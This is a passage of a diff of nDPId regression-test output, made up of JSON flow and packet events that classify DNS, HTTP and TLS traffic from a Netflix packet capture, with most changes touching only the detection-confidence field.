{"query":"a803.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.24"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":891,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a803.dscg.akamai.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.24"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049672,"flow_last_seen":1484319049672,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049672,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1484319049672,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049672,"pkt":"gCqoTGHM5JjWH70UCABFAABAS8NAAEAGqRPAqAEHuBnMGM+hAFBgKjK0AAAAALAC\/\/92\/gAAAgQFtAEDAwUBAQgKH2T36AAAAAAEAgAA"} 
00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1484319049681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1484319049681,"pkt":"5JjWH70UgCqoTGHMCABFAAFl4UhAAEAR1ObAqAEBwKgBBwA1zHsBUaLnX+eBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAAcAAHADAAFAAEAAABiAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAFYABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AHAABAAAAFwAQJiABCHAPAAAAAAAANChyo8BNABwAAQAAABcAECYgAQhwDwAAAAAAADQoMS\/ATQAcAAEAAAAXABAmIAEIcA8AAAAAAAA0KQT4wE0AHAABAAAAFwAQJiABCHAPAAAAAAAANCk7ncBNABwAAQAAABcAECYgAQhwDwAAAAAAADQnRIjATQAcAAEAAAAXABAmIAEIcA8AAAAAAAA0KBwAwE0AHAABAAAAFwAQJiABCHAPAAAAAAAANCh7ccBNABwAAQAAABcAECYgAQhwDwAAAAAAADQoNhw="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319049681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.32.1.8"}} 
+00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":896,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319049681,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"38.32.1.8"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049684,"flow_last_seen":1484319049684,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319049684,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1484319049684,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319049684,"pkt":"gCqoTGHM5JjWH70UCABFAABAHF1AAEAGFLrAqAEHNr8RM8+qAbupwyRaAAAAALAC\/\/92fwAAAgQFtAEDAwUBAQgKH2T39AAAAAAEAgAA"} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1484319049697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049697,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lq4GcwYwKgBBwBQz6GV0BcIYCoytaAScSDlwwAAAgQFtAQCCAr\/\/IQ4H2T36AEDAwU="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1484319049700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049700,"pkt":"gCqoTGHM5JjWH70UCABFAAA0bmdAAEAGhnvAqAEHuBnMGM+hAFBgKjK1ldAXCYAQEBV1gAAAAQEICh9k+AH\/\/IQ4"} -00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049672,"flow_last_seen":1484319049703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049703,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 
+00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":902,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049672,"flow_last_seen":1484319049703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319049703,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1484319049740,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319049740,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGRvs2vxEzwKgBBwG7z6pwpjzKqcMkW6ASOJCp2gAAAgQFtAQCCAqtikoKH2T39AEDAwg="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":910,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1484319049743,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319049743,"pkt":"gCqoTGHM5JjWH70UCABFAAA0ddRAAEAGu07AqAEHNr8RM8+qAbupwyRbcKY8y4AQEBUA7QAAAQEICh9k+CqtikoK"} 
-00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049684,"flow_last_seen":1484319049748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319049748,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049672,"flow_last_seen":1484319049753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1484319049753,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":200,"content_type":"text\/plain","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} 
-01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":920,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049684,"flow_last_seen":1484319049807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319049807,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01358{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":923,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319049684,"flow_last_seen":1484319049850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319049850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049684,"flow_last_seen":1484319049748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319049748,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049672,"flow_last_seen":1484319049753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1484319049753,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"tp.akam.nflximg.com","url":"tp.akam.nflximg.com\/tpa3\/616\/2041779616.bif","code":200,"content_type":"text\/plain","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}} +01018{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":920,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319049684,"flow_last_seen":1484319049807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319049807,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01358{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":923,"source":"netflix.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319049684,"flow_last_seen":1484319049850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319049850,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.191.17.51","src_port":53162,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319050652,"flow_last_seen":1484319050652,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319050652,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1484319050652,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319050652,"pkt":"gCqoTGHM5JjWH70UCABFAABA2xBAAEAGenHAqAEHF\/YLkc+rAFC8XkCtAAAAALAC\/\/9pzAAAAgQFtAEDAwUBAQgKH2T7jgAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1484319050677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319050677,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmYX9guRwKgBBwBQz6susPTdvF5ArqAS\/\/\/2WQAAAgQFtAEDAwkEAggKRVwbeB9k+44="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1484319050678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319050678,"pkt":"gCqoTGHM5JjWH70UCABFAAA0kSxAAEAGxGHAqAEHF\/YLkc+rAFC8XkCuLrD03oAQEBUU+gAAAQEICh9k+6dFXBt4"} -01128{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":972,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319050652,"flow_last_seen":1484319050682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319050682,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.145","url":"23.246.11.145\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=5xfYVtna3GdYXL71uNs6DZ-X84Y&random=3930708224","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 
+01128{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":972,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319050652,"flow_last_seen":1484319050682,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319050682,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.145","url":"23.246.11.145\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=5xfYVtna3GdYXL71uNs6DZ-X84Y&random=3930708224","code":0,"content_type":"","user_agent":"netflix-ios-app"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319052216,"flow_last_seen":1484319052216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319052216,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1484319052216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319052216,"pkt":"gCqoTGHM5JjWH70UCABFAABAN3hAAEAGHxDAqAEHF\/YKi8+sAFBgdy0VAAAAALAC\/\/\/UZQAAAgQFtAEDAwUBAQgKH2UBeQAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1484319052235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319052235,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGW2wX9gqLwKgBBwBQz6xlmlqWYHctFqAS\/\/8JBgAAAgQFtAEDAwkEAggKQI7bkB9lAXk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1484319052237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319052237,"pkt":"gCqoTGHM5JjWH70UCABFAAA0JFZAAEAGMj7AqAEHF\/YKi8+sAFBgdy0WZZpal4AQEBUnrAAAAQEICh9lAYxAjtuQ"} 
-01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319052216,"flow_last_seen":1484319052242,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319052242,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.10.139","url":"23.246.10.139\/range\/0-65535?o=AQEfKq2oMrLRiWL-p-VeIZ6WKRq-X6LMvaLqgxWBCuFbh09MpreORUUOO5Tx1683HPnLY6BPjN_9mlDuYihGZoXu9u0ozH8RFioBN_JDNiRscidjvoSdWmlyZgPNansW0lkBr4X81HvloOi8BS_exVSPhMyJQTB5bg&v=3&e=1484347850&t=-djGXIcbFBNzyfugqEWcrgtCpyY&random=3407360776","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319052216,"flow_last_seen":1484319052242,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":356,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319052242,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 